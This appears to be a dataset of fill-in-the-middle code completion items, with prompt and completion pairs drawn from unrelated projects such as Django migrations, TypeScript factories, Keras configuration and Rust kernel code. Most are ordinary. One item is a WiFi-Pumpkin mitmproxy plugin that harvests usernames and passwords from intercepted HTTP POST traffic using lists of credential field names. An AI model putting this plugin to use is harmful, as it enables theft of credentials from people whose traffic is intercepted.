prompt
large_stringlengths 70
991k
| completion
large_stringlengths 0
1.02k
|
---|---|
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright 2016 ACSONE SA/NV (<http://acsone.eu>)<|fim▁hole|># License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from . import mass_mailing_stats<|fim▁end|>
| |
<|file_name|>dump_post_data.py<|end_file_name|><|fim▁begin|>from plugins.extension.plugin import PluginTemplate
from mitmproxy.models import decoded
from PyQt4.QtCore import QObject,pyqtSignal
import re
"""
Description:
This program is a core for wifi-pumpkin.py. file which includes functionality
plugins for Pumpkin-Proxy.
Copyright:<|fim▁hole|> This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>
"""
class dump_post_data(PluginTemplate):
meta = {
'Name' : 'dump_post_data',
'Version' : '1.0',
'Description' : 'Getting HTTP post data capture login post and logout pre event hook and its its working in web',
'Author' : 'Marcos Nesster'
}
def __init__(self):
for key,value in self.meta.items():
self.__dict__[key] = value
self.ConfigParser = False
def get_password_POST(self, content):
user = None
passwd = None
# Taken mainly from Pcredz by Laurent Gaffie
userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name',
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in']
passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password'
'passwort', 'passwrd', 'wppassword', 'upasswd']
for login in userfields:
login_re = re.search('(%s=[^&]+)' % login, content, re.IGNORECASE)
if login_re:
user = login_re.group()
for passfield in passfields:
pass_re = re.search('(%s=[^&]+)' % passfield, content, re.IGNORECASE)
if pass_re:
passwd = pass_re.group()
if user and passwd:
return (user, passwd)
def request(self, flow):
self.send_output.emit("FOR: " + flow.request.url +" "+ flow.request.method + " " + flow.request.path + " " + flow.request.http_version)
with decoded(flow.request):
user_passwd = self.get_password_POST(flow.request.content)
if user_passwd != None:
try:
http_user = user_passwd[0].decode('utf8')
http_pass = user_passwd[1].decode('utf8')
# Set a limit on how long they can be prevent false+
if len(http_user) > 75 or len(http_pass) > 75:
return
self.send_output.emit("\n[{}][HTTP REQUEST HEADERS]\n".format(self.Name))
for name, valur in flow.request.headers.iteritems():
self.send_output.emit('{}: {}'.format(name,valur))
self.send_output.emit( 'HTTP username: %s' % http_user)
self.send_output.emit( 'HTTP password: %s\n' % http_pass)
except UnicodeDecodeError:
pass
def response(self, flow):
pass<|fim▁end|>
|
Copyright (C) 2015-2016 Marcos Nesster P0cl4bs Team
|
<|file_name|>classMethods.ts<|end_file_name|><|fim▁begin|>class A {
<|fim▁hole|> a(): void {
}
b(a: string): number {
return 0;
}
}<|fim▁end|>
| |
<|file_name|>stackedsplinearea.d.ts<|end_file_name|><|fim▁begin|>/*!
* devextreme-angular
* Version: 16.2.5
* Build date: Tue Feb 28 2017
*
* Copyright (c) 2012 - 2017 Developer Express Inc. ALL RIGHTS RESERVED
*
* This software may be modified and distributed under the terms
* of the MIT license. See the LICENSE file in the root of the project for details.
*
* https://github.com/DevExpress/devextreme-angular
*/
import { NestedOptionHost } from '../../core/nested-option';
import { DxoChartCommonSeriesSettings } from './base/chart-common-series-settings';<|fim▁hole|>}
export declare class DxoStackedsplineareaModule {
}<|fim▁end|>
|
export declare class DxoStackedsplineareaComponent extends DxoChartCommonSeriesSettings {
protected readonly _optionPath: string;
constructor(parentOptionHost: NestedOptionHost, optionHost: NestedOptionHost);
|
<|file_name|>0066_issue_force_free_access.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-02-20 22:01
from __future__ import unicode_literals
from django.db import migrations, models
<|fim▁hole|> ('erudit', '0065_auto_20170202_1152'),
]
operations = [
migrations.AddField(
model_name='issue',
name='force_free_access',
field=models.BooleanField(default=False, verbose_name='Contraindre en libre accès'),
),
]<|fim▁end|>
|
class Migration(migrations.Migration):
dependencies = [
|
<|file_name|>config_nmta.py<|end_file_name|><|fim▁begin|>from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from keras.optimizers import SGD
from keras.optimizers import Adam
from keras.optimizers import adadelta
from keras.optimizers import rmsprop
from keras.layers import Layer
from keras import backend as K
K.set_image_dim_ordering('tf')
import socket
import os
# -------------------------------------------------
# Background config:
hostname = socket.gethostname()
if hostname == 'baymax':
path_var = 'baymax/'
elif hostname == 'walle':
path_var = 'walle/'
elif hostname == 'bender':
path_var = 'bender/'
else:
path_var = 'zhora/'
DATA_DIR= '/local_home/JAAD_Dataset/iros/resized_imgs_128/train/'
# DATA_DIR= '/local_home/data/KITTI_data/'
HD_DATA_DIR= '/local_home/JAAD_Dataset/iros/resized_imgs_256/train/'
VAL_DATA_DIR= '/local_home/JAAD_Dataset/iros/resized_imgs_128/val/'
VAL_HD_DATA_DIR= '/local_home/JAAD_Dataset/iros/resized_imgs_256/val/'
TEST_DATA_DIR= '/local_home/JAAD_Dataset/iros/resized_imgs_128/test/'
MODEL_DIR = './../' + path_var + 'models'
if not os.path.exists(MODEL_DIR):
os.mkdir(MODEL_DIR)
CHECKPOINT_DIR = './../' + path_var + 'checkpoints'
if not os.path.exists(CHECKPOINT_DIR):
os.mkdir(CHECKPOINT_DIR)
ATTN_WEIGHTS_DIR = './../' + path_var + 'attn_weights'
if not os.path.exists(ATTN_WEIGHTS_DIR):
os.mkdir(ATTN_WEIGHTS_DIR)
GEN_IMAGES_DIR = './../' + path_var + 'generated_images'
if not os.path.exists(GEN_IMAGES_DIR):
os.mkdir(GEN_IMAGES_DIR)
CLA_GEN_IMAGES_DIR = GEN_IMAGES_DIR + '/cla_gen/'
if not os.path.exists(CLA_GEN_IMAGES_DIR):
os.mkdir(CLA_GEN_IMAGES_DIR)
LOG_DIR = './../' + path_var + 'logs'
if not os.path.exists(LOG_DIR):
os.mkdir(LOG_DIR)
TF_LOG_DIR = './../' + path_var + 'tf_logs'
if not os.path.exists(TF_LOG_DIR):
os.mkdir(TF_LOG_DIR)
TF_LOG_GAN_DIR = './../' + path_var + 'tf_gan_logs'
if not os.path.exists(TF_LOG_GAN_DIR):
os.mkdir(TF_LOG_GAN_DIR)
TEST_RESULTS_DIR = './../' + path_var + 'test_results'
if not os.path.exists(TEST_RESULTS_DIR):
os.mkdir(TEST_RESULTS_DIR)
PRINT_MODEL_SUMMARY = True
SAVE_MODEL = True
PLOT_MODEL = True
SAVE_GENERATED_IMAGES = True
SHUFFLE = True
VIDEO_LENGTH = 30
IMG_SIZE = (128, 128, 3)
ADVERSARIAL = False
BUF_SIZE = 10
LOSS_WEIGHTS = [1, 1]
ATTN_COEFF = 0
KL_COEFF = 0
# -------------------------------------------------
# Network configuration:
print ("Loading network/training configuration.")
print ("Config file: " + str(__name__))
BATCH_SIZE = 7
NB_EPOCHS_AUTOENCODER = 30<|fim▁hole|>
OPTIM_A = Adam(lr=0.0001, beta_1=0.5)
OPTIM_G = Adam(lr=0.00001, beta_1=0.5)
# OPTIM_D = Adam(lr=0.000001, beta_1=0.5)
# OPTIM_D = SGD(lr=0.000001, momentum=0.5, nesterov=True)
OPTIM_D = rmsprop(lr=0.000001)
lr_schedule = [10, 20, 30] # epoch_step
def schedule(epoch_idx):
if (epoch_idx + 1) < lr_schedule[0]:
return 0.0001
elif (epoch_idx + 1) < lr_schedule[1]:
return 0.0001 # lr_decay_ratio = 10
elif (epoch_idx + 1) < lr_schedule[2]:
return 0.00001
return 0.000001<|fim▁end|>
|
NB_EPOCHS_GAN = 0
|
<|file_name|>CollectionRightsObjectFactory.ts<|end_file_name|><|fim▁begin|>// Copyright 2016 The Oppia Authors. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS-IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
/**
* @fileoverview Factory for creating and mutating instances of frontend
* collection rights domain objects.
*/
import cloneDeep from 'lodash/cloneDeep';
import { downgradeInjectable } from '@angular/upgrade/static';
import { Injectable } from '@angular/core';
export interface CollectionRightsBackendDict {
'collection_id': number;
'can_edit': boolean;
'can_unpublish': boolean;
'is_private': boolean;
'owner_names': string[];
}<|fim▁hole|> _collectionId: number;
_canEdit: boolean;
_canUnpublish: boolean;
_isPrivate: boolean;
_ownerNames: string[];
constructor(collectionRightsObject: CollectionRightsBackendDict) {
this._collectionId = collectionRightsObject.collection_id;
this._canEdit = collectionRightsObject.can_edit;
this._canUnpublish = collectionRightsObject.can_unpublish;
this._isPrivate = collectionRightsObject.is_private;
this._ownerNames = collectionRightsObject.owner_names;
}
getCollectionId(): number {
return this._collectionId;
}
// Returns true if the the user can edit the collection. This property is
// immutable.
canEdit(): boolean {
return this._canEdit;
}
// Returns true if the user can unpublish the collection.
canUnpublish(): boolean {
return this._canUnpublish;
}
// Returns true if the collection is private.
isPrivate(): boolean {
return this._isPrivate;
}
// Returns true if the collection is public.
isPublic(): boolean {
return !this._isPrivate;
}
// Sets isPrivate to false only if the user can edit the corresponding
// collection.
setPublic(): void {
if (this.canEdit()) {
this._isPrivate = false;
} else {
throw new Error('User is not allowed to edit this collection.');
}
}
// Sets isPrivate to true only if canUnpublish and canEdit are both true.
setPrivate(): void {
if (this.canEdit() && this.canUnpublish()) {
this._isPrivate = true;
} else {
throw new Error('User is not allowed to unpublish this collection.');
}
}
// Returns the owner names of the collection. This property is immutable.
getOwnerNames(): string[] {
return cloneDeep(this._ownerNames);
}
// Returns the reference to the internal ownerNames array; this function is
// only meant to be used for Angular bindings and should never be used in
// code. Please use getOwnerNames() and related functions, instead. Please
// also be aware this exposes internal state of the collection rights domain
// object, so changes to the array itself may internally break the domain
// object.
getBindableOwnerNames(): string[] {
return this._ownerNames;
}
// Reassigns all values within this collection to match the existing
// collection rights. This is performed as a deep copy such that none of the
// internal, bindable objects are changed within this collection rights.
// Note that the collection nodes within this collection will be completely
// redefined as copies from the specified collection rights.
copyFromCollectionRights(otherCollectionRights: CollectionRights): void {
this._collectionId = otherCollectionRights.getCollectionId();
this._canEdit = otherCollectionRights.canEdit();
this._isPrivate = otherCollectionRights.isPrivate();
this._canUnpublish = otherCollectionRights.canUnpublish();
this._ownerNames = otherCollectionRights.getOwnerNames();
}
}
@Injectable({
providedIn: 'root'
})
export class CollectionRightsObjectFactory {
// Static class methods. Note that "this" is not available in static
// contexts. This function takes a JSON object which represents a backend
// collection python dict.
create(
collectionRightsBackendObject: CollectionRightsBackendDict):
CollectionRights {
return new CollectionRights(cloneDeep(collectionRightsBackendObject));
}
// Create a new, empty collection rights object. This is not guaranteed to
// pass validation tests.
createEmptyCollectionRights(): CollectionRights {
return new CollectionRights({
owner_names: [],
collection_id: null,
can_edit: null,
can_unpublish: null,
is_private: null
});
}
}
angular.module('oppia').factory(
'CollectionRightsObjectFactory',
downgradeInjectable(CollectionRightsObjectFactory));<|fim▁end|>
|
export class CollectionRights {
|
<|file_name|>tunnels.py<|end_file_name|><|fim▁begin|># coding=utf-8
#
# Copyright 2016 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""BIG-IP® Network tunnels module.
REST URI
``http://localhost/mgmt/tm/net/tunnels``
GUI Path
``Network --> tunnels``
REST Kind
``tm:net:tunnels:*``
"""
from f5.bigip.resource import Collection
from f5.bigip.resource import OrganizingCollection
from f5.bigip.resource import Resource
class TunnelS(OrganizingCollection):
"""BIG-IP® network tunnels collection"""
def __init__(self, net):
super(TunnelS, self).__init__(net)
self._meta_data['allowed_lazy_attributes'] = [
Gres,
Tunnels,
Vxlans,
]
class Tunnels(Collection):
"""BIG-IP® network tunnels resource (collection for GRE, Tunnel, VXLANs"""
def __init__(self, tunnelS):
super(Tunnels, self).__init__(tunnelS)
self._meta_data['allowed_lazy_attributes'] = [Gres, Tunnel, Vxlans]
self._meta_data['attribute_registry'] =\
{'tm:net:tunnels:tunnel:tunnelstate': Tunnel}
class Tunnel(Resource):
"""BIG-IP® tunnels tunnel resource"""
def __init__(self, tunnels):
super(Tunnel, self).__init__(tunnels)
self._meta_data['required_creation_parameters'].update(('partition',))
self._meta_data['required_json_kind'] =\
'tm:net:tunnels:tunnel:tunnelstate'
class Gres(Collection):
"""BIG-IP® tunnels GRE sub-collection"""
def __init__(self, tunnels):
super(Gres, self).__init__(tunnels)
self._meta_data['allowed_lazy_attributes'] = [Gre]
self._meta_data['attribute_registry'] =\
{'tm:net:tunnels:gre:grestate': Gre}
class Gre(Resource):
"""BIG-IP® tunnels GRE sub-collection resource"""
def __init__(self, gres):
super(Gre, self).__init__(gres)<|fim▁hole|> self._meta_data['required_json_kind'] =\
'tm:net:tunnels:gre:grestate'
class Vxlans(Collection):
"""BIG-IP® tunnels VXLAN sub-collection"""
def __init__(self, tunnels):
super(Vxlans, self).__init__(tunnels)
self._meta_data['allowed_lazy_attributes'] = [Vxlan]
self._meta_data['attribute_registry'] =\
{'tm:net:tunnels:vxlan:vxlanstate': Vxlan}
class Vxlan(Resource):
"""BIG-IP® tunnels VXLAN sub-collection resource"""
def __init__(self, vxlans):
super(Vxlan, self).__init__(vxlans)
self._meta_data['required_creation_parameters'].update(('partition',))
self._meta_data['required_json_kind'] =\
'tm:net:tunnels:vxlan:vxlanstate'<|fim▁end|>
|
self._meta_data['required_creation_parameters'].update(('partition',))
|
<|file_name|>index.d.ts<|end_file_name|><|fim▁begin|>// Type definitions for tiny-async-pool 1.0
// Project: https://github.com/rxaviers/async-pool#readme
// Definitions by: Karl-Philipp Wulfert <https://github.com/krlwlfrt>
// Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped
/**
* This declaration specifies that the function is the exported object from the file
*/
export = asyncPool;
/**
* Runs multiple promise-returning & async functions in a limited concurrency pool.
* It rejects immediately as soon as one of the promises rejects.
* It resolves when all the promises completes.
* It calls the iterator function as soon as possible (under concurrency limit).
*
* @param poolLimit The pool limit number (>= 1).
* @param array Input array.
* @param iteratorFn Iterator function that takes two arguments (array item and the array itself).
* The iterator function should either return a promise or be an async function.<|fim▁hole|> */
declare function asyncPool<IN, OUT>(
poolLimit: number,
array: ReadonlyArray<IN>,
iteratorFn: (generator: IN) => Promise<OUT>
): Promise<OUT[]>;<|fim▁end|>
|
*
* @template IN Type of the input array
* @template OUT Type of the resolves of the promises
|
<|file_name|>context.rs<|end_file_name|><|fim▁begin|>use alloc::arc::Arc;
use alloc::boxed::Box;
use collections::{BTreeMap, Vec};
use spin::Mutex;
use arch;
use context::file::File;
use context::memory::{Grant, Memory, SharedMemory, Tls};
use syscall::data::Event;
use sync::{WaitMap, WaitQueue};
#[derive(Copy, Clone, Debug, Eq, PartialEq)]
pub enum Status {
Runnable,
Blocked,
Exited(usize)
}
/// A context, which identifies either a process or a thread
#[derive(Debug)]
pub struct Context {
/// The ID of this context
pub id: usize,<|fim▁hole|> /// The ID of the parent context
pub ppid: usize,
/// The real user id
pub ruid: u32,
/// The real group id
pub rgid: u32,
/// The effective user id
pub euid: u32,
/// The effective group id
pub egid: u32,
/// Status of context
pub status: Status,
/// Context running or not
pub running: bool,
/// CPU ID, if locked
pub cpu_id: Option<usize>,
/// Context is halting parent
pub vfork: bool,
/// Context is being waited on
pub waitpid: Arc<WaitMap<usize, usize>>,
/// Context should wake up at specified time
pub wake: Option<(u64, u64)>,
/// The architecture specific context
pub arch: arch::context::Context,
/// Kernel FX
pub kfx: Option<Box<[u8]>>,
/// Kernel stack
pub kstack: Option<Box<[u8]>>,
/// Executable image
pub image: Vec<SharedMemory>,
/// User heap
pub heap: Option<SharedMemory>,
/// User stack
pub stack: Option<Memory>,
/// User Tls
pub tls: Option<Tls>,
/// User grants
pub grants: Arc<Mutex<Vec<Grant>>>,
/// The name of the context
pub name: Arc<Mutex<Vec<u8>>>,
/// The current working directory
pub cwd: Arc<Mutex<Vec<u8>>>,
/// Kernel events
pub events: Arc<WaitQueue<Event>>,
/// The process environment
pub env: Arc<Mutex<BTreeMap<Box<[u8]>, Arc<Mutex<Vec<u8>>>>>>,
/// The open files in the scheme
pub files: Arc<Mutex<Vec<Option<File>>>>
}
impl Context {
/// Create a new context
pub fn new(id: usize) -> Context {
Context {
id: id,
ppid: 0,
ruid: 0,
rgid: 0,
euid: 0,
egid: 0,
status: Status::Blocked,
running: false,
cpu_id: None,
vfork: false,
waitpid: Arc::new(WaitMap::new()),
wake: None,
arch: arch::context::Context::new(),
kfx: None,
kstack: None,
image: Vec::new(),
heap: None,
stack: None,
tls: None,
grants: Arc::new(Mutex::new(Vec::new())),
name: Arc::new(Mutex::new(Vec::new())),
cwd: Arc::new(Mutex::new(Vec::new())),
events: Arc::new(WaitQueue::new()),
env: Arc::new(Mutex::new(BTreeMap::new())),
files: Arc::new(Mutex::new(Vec::new()))
}
}
pub fn canonicalize(&self, path: &[u8]) -> Vec<u8> {
if path.iter().position(|&b| b == b':').is_none() {
let cwd = self.cwd.lock();
if path == b"." {
cwd.clone()
} else if path == b".." {
cwd[..cwd[..cwd.len() - 1]
.iter().rposition(|&b| b == b'/' || b == b':')
.map_or(cwd.len(), |i| i + 1)]
.to_vec()
} else if path.starts_with(b"./") {
let mut canon = cwd.clone();
if ! canon.ends_with(b"/") {
canon.push(b'/');
}
canon.extend_from_slice(&path[2..]);
canon
} else if path.starts_with(b"../") {
let mut canon = cwd[..cwd[..cwd.len() - 1]
.iter().rposition(|&b| b == b'/' || b == b':')
.map_or(cwd.len(), |i| i + 1)]
.to_vec();
canon.extend_from_slice(&path[3..]);
canon
} else if path.starts_with(b"/") {
let mut canon = cwd[..cwd.iter().position(|&b| b == b':').map_or(1, |i| i + 1)].to_vec();
canon.extend_from_slice(&path);
canon
} else {
let mut canon = cwd.clone();
if ! canon.ends_with(b"/") {
canon.push(b'/');
}
canon.extend_from_slice(&path);
canon
}
} else {
path.to_vec()
}
}
pub fn block(&mut self) -> bool {
if self.status == Status::Runnable {
self.status = Status::Blocked;
true
} else {
false
}
}
pub fn unblock(&mut self) -> bool {
if self.status == Status::Blocked {
self.status = Status::Runnable;
if let Some(cpu_id) = self.cpu_id {
if cpu_id != ::cpu_id() {
// Send IPI if not on current CPU
// TODO: Make this more architecture independent
unsafe { arch::device::local_apic::LOCAL_APIC.ipi(cpu_id) };
}
}
true
} else {
false
}
}
/// Add a file to the lowest available slot.
/// Return the file descriptor number or None if no slot was found
pub fn add_file(&self, file: File) -> Option<usize> {
let mut files = self.files.lock();
for (i, mut file_option) in files.iter_mut().enumerate() {
if file_option.is_none() {
*file_option = Some(file);
return Some(i);
}
}
let len = files.len();
if len < super::CONTEXT_MAX_FILES {
files.push(Some(file));
Some(len)
} else {
None
}
}
/// Get a file
pub fn get_file(&self, i: usize) -> Option<File> {
let files = self.files.lock();
if i < files.len() {
files[i]
} else {
None
}
}
/// Remove a file
// TODO: adjust files vector to smaller size if possible
pub fn remove_file(&self, i: usize) -> Option<File> {
let mut files = self.files.lock();
if i < files.len() {
files[i].take()
} else {
None
}
}
}<|fim▁end|>
| |
<|file_name|>artifacts.py<|end_file_name|><|fim▁begin|>import re
from django import template
from django.template.loader import get_template<|fim▁hole|>
INSTALLED_ARTIFACTS = dict()
def install(artifact_class):
INSTALLED_ARTIFACTS[artifact_class.key] = artifact_class
def find(data):
from fir_artifacts.models import ArtifactBlacklistItem
result = dict()
for key in INSTALLED_ARTIFACTS:
blacklist = ArtifactBlacklistItem.objects.filter(type=key).values_list('value', flat=True)
values = INSTALLED_ARTIFACTS[key].find(data)
values = [v for v in values if v not in blacklist]
result[key] = values
return result
def after_save(type, value, event):
return INSTALLED_ARTIFACTS[type].after_save(value, event)
def incs_for_art(art_string):
from fir_artifacts.models import Artifact
artifacts = Artifact.objects.filter(value__contains=art_string)
incs = []
for a in artifacts:
incs.extend(a.relations.all())
return incs
def all_for_object(obj, raw=False, user=None):
result = []
total_count = 0
correlated_count = 0
if not hasattr(obj, "artifacts"):
return (result, total_count, correlated_count)
for artifact in INSTALLED_ARTIFACTS:
values = obj.artifacts.filter(type=artifact)
artifact_collection = INSTALLED_ARTIFACTS[artifact](values, obj, user=user)
total_count += values.count()
correlated_count += artifact_collection.correlated_count()
result.append(artifact_collection)
return (result, total_count, correlated_count)
class AbstractArtifact:
case_sensitive = False
template = 'fir_artifacts/default.html'
@classmethod
def find(cls, data):
results = []
for i in re.finditer(cls.regex, data):
if cls.case_sensitive:
results.append(i.group('search'))
else:
results.append(i.group('search').lower())
return results
@classmethod
def after_save(cls, value, event):
# Do nothing, allows for specific callback in subclasses
pass
def __init__(self, artifacts, event, user=None):
class ArtifactDisplay(object):
def __init__(self, artifact, user):
self.artifact = artifact
self.correlation_count = self.artifact.relations_for_user(user).count()
@property
def value(self):
return self.artifact.value
@property
def type(self):
return self.artifact.type
@property
def id(self):
return self.artifact.id
@property
def pk(self):
return self.artifact.pk
self._artifacts = [ArtifactDisplay(artifact, user) for artifact in artifacts]
self._event = event
self._correlated = []
for artifact in self._artifacts:
if artifact.correlation_count > 1:
self._correlated.append(artifact)
def json(self, request):
return self.display(request, correlated=False, json=True)
def display(self, request, correlated=False, json=False):
context = RequestContext(request)
template = get_template(self.__class__.template)
context['artifact_name'] = self.__class__.display_name
if correlated:
context['artifact_values'] = self._correlated
else:
context['artifact_values'] = self._artifacts
context['event'] = self._event
if not json:
return template.render(context.flatten(), request)
else:
return context.flatten()
def correlated_count(self):
return len(self._correlated)<|fim▁end|>
|
from django.template import RequestContext
register = template.Library()
|
<|file_name|>testlibbind_ns_msg.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
#
# testlibbind_ns_msg.py - Unit tests for the libbind ns_msg wrapper
#
# This file is part of Strangle.
#
# Strangle is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Strangle is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Strangle; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import sys, testutils, random
import unittest
from Strangle import libbind
class ns_msgTestCase(unittest.TestCase):
"""Tests for the wrapper around the libbind ns_msg struct"""
def test000Exists(self):
"""Check that the ns_msg type object exists cleanly in the module"""
assert(libbind.ns_msg.__class__ is type)
def testInstantiate(self):
"""Check that the ns_msg type accepts the correct arguments"""
# Too few
self.assertRaises(TypeError, libbind.ns_msg)
# Too many
self.assertRaises(TypeError, libbind.ns_msg, 'one', 'two')
def testNoticeInvalid(self):
"""Test whether the ns_msg type can handle bad data"""
rng = testutils.rng
for testNum in range(0, 50):
packetLength = random.randrange(20, 80)
packetVal = rng.read(packetLength)
self.assertRaises(TypeError, libbind.ns_msg, packetVal)
def testParseValidQuery(self):
"""Test whether ns_msg initialization parses valid NS queries"""
packetData = file("data/www.company.example-query").read()
n = libbind.ns_msg(packetData)
assert(type(n) is libbind.ns_msg)
def testParseValidResponse(self):
"""Test whether ns_msg initialization parses valid NS queries"""
packetData = file("data/www.company.example-response").read()
n = libbind.ns_msg(packetData)<|fim▁hole|> s = unittest.TestSuite()
s.addTest( unittest.makeSuite(ns_msgTestCase, 'test') )
return s
if __name__ == "__main__":
unittest.main()<|fim▁end|>
|
assert(type(n) is libbind.ns_msg)
def suite():
|
<|file_name|>0013_auto_20180516_1559.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2018-05-16 18:59
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0012_auto_20180227_0858'),
]
operations = [
migrations.AlterModelOptions(
name='user',<|fim▁hole|><|fim▁end|>
|
options={'ordering': ('first_name', 'last_name'), 'permissions': (('menu_dados_auxiliares', 'Mostrar Menu Dados Auxiliares'), ('menu_tabelas_auxiliares', 'Mostrar Menu de Tabelas Auxiliares'), ('menu_contatos', 'Mostrar Menu de Cadastro de Contatos'), ('menu_grupocontatos', 'Mostrar Menu de Cadastro de Grupos de Contatos'), ('menu_processos', 'Mostrar Menu de Cadastro de Processos'), ('menu_area_trabalho', 'Mostrar Menu de Áreas de Trabalho'), ('menu_impresso_enderecamento', 'Mostrar Menu de Impressos de Endereçamento'), ('menu_relatorios', 'Mostrar Menu de Relatórios'), ('menu_administracao', 'Mostrar Menu de Administração'), ('menu_agenda', 'Mostrar Menu da Agenda de Eventos'))},
),
]
|
<|file_name|>dto.rs<|end_file_name|><|fim▁begin|>use game_status::PlayerName;
use card::Card;
use card::Suit;
use card::dto::CardDto;
use deal::Deal;
use deal::DealCard;
use error::Error;
use error::Result;
use std::convert::TryFrom;
use std::str::FromStr;
#[derive(Serialize, Deserialize, Debug)]
pub struct DealDto {
#[serde(rename = "DealNumber")]
deal_number: u32,
#[serde(rename = "Initiator", default)]
initiator: Option<PlayerName>,
#[serde(rename = "SuitType")]
suit_type: String,
#[serde(rename = "DealCards", default)]
deal_cards: Vec<DealCardDto>,
#[serde(rename = "DealWinner", default)]
deal_winner: Option<PlayerName>,
}
impl TryFrom<DealDto> for Deal {
type Error = Error;
fn try_from(dto: DealDto) -> Result<Deal> {
let deal_cards = dto.deal_cards
.into_iter()
.map(DealCard::try_from)
.collect::<Result<Vec<DealCard>>>()?;
let suit = Suit::from_str(&dto.suit_type)?;
Ok(Deal {
deal_number: dto.deal_number,
initiator: dto.initiator,
suit: if deal_cards.is_empty() {
None
} else {
Some(suit)
},
deal_cards: deal_cards,
deal_winner: dto.deal_winner,
})
}
}
impl<'a> From<&'a Deal> for DealDto {
fn from(deal: &'a Deal) -> DealDto {
DealDto {
deal_number: deal.deal_number,
initiator: deal.initiator.clone(),
suit_type: deal.suit.unwrap_or(Suit::Club).into(),
deal_cards: deal.deal_cards.iter().map(DealCardDto::from).collect(),
deal_winner: deal.deal_winner.clone(),
}
}
}
#[derive(Serialize, Deserialize, Debug)]
pub struct DealCardDto {
#[serde(rename = "TeamName")]
team_name: PlayerName,
#[serde(rename = "Card")]
card: CardDto,
}
impl TryFrom<DealCardDto> for DealCard {
type Error = Error;
fn try_from(dto: DealCardDto) -> Result<DealCard> {
Ok(DealCard {
player_name: dto.team_name.clone(),
card: Card::try_from(dto.card)?,
})
}
}
<|fim▁hole|> fn from(deal_card: &'a DealCard) -> DealCardDto {
DealCardDto {
team_name: deal_card.player_name.clone(),
card: CardDto::from(&deal_card.card),
}
}
}<|fim▁end|>
|
impl<'a> From<&'a DealCard> for DealCardDto {
|
<|file_name|>envelope.rs<|end_file_name|><|fim▁begin|>//! Envelope function used by sounds 1, 2 and 4
use spu::{Sample, SOUND_MAX};
#[derive(Clone,Copy)]
pub struct Envelope {
direction: EnvelopeDirection,
volume: Volume,
step_duration: u32,
counter: u32,
}
impl Envelope {
pub fn from_reg(val: u8) -> Envelope {
let vol = Volume::from_field(val >> 4);
let dir =
match val & 8 != 0 {
true => EnvelopeDirection::Up,
false => EnvelopeDirection::Down,
};
let l = (val & 7) as u32;
Envelope {
direction: dir,
volume: vol,
step_duration: l * 0x10000,
counter: 0,
}
}
pub fn into_reg(&self) -> u8 {
let vol = self.volume.into_field();
let dir = self.direction as u8;
let l = (self.step_duration / 0x10000) as u8;
(vol << 4) | (dir << 3) | l
}
pub fn step(&mut self) {
if self.step_duration == 0 {
// If the step duration is 0 the envelope is not active
return;
}
self.counter += 1;
self.counter %= self.step_duration;
if self.counter == 0 {
// Move on to the next step
match self.direction {
EnvelopeDirection::Up => self.volume.up(),
EnvelopeDirection::Down => self.volume.down(),
}
}
}
pub fn into_sample(&self) -> Sample {
self.volume.into_sample()
}
/// DAC is disabled when envelope direction goes down and volume is 0
pub fn dac_enabled(&self) -> bool {
self.direction != EnvelopeDirection::Down ||
self.volume.into_sample() != 0
}
}
// Sound envelopes can become louder or quieter
#[derive(Clone,Copy,PartialEq,Eq)]
pub enum EnvelopeDirection {
// Volume increases at each step
Up = 1,
// Volume decreases at each step
Down = 0,
}
/// The game boy sound uses 4bit DACs and can therefore only output 16
/// sound levels
#[derive(Clone,Copy)]
struct Volume(u8);
impl Volume {
fn from_field(vol: u8) -> Volume {
if vol > SOUND_MAX {
panic!("Volume out of range: {}", vol);
}
Volume(vol)
}
fn into_field(self) -> u8 {
let Volume(v) = self;
v
}
/// Convert from 4-bit volume value to Sample range
fn into_sample(self) -> Sample {
let Volume(v) = self;
v as Sample
}
<|fim▁hole|>
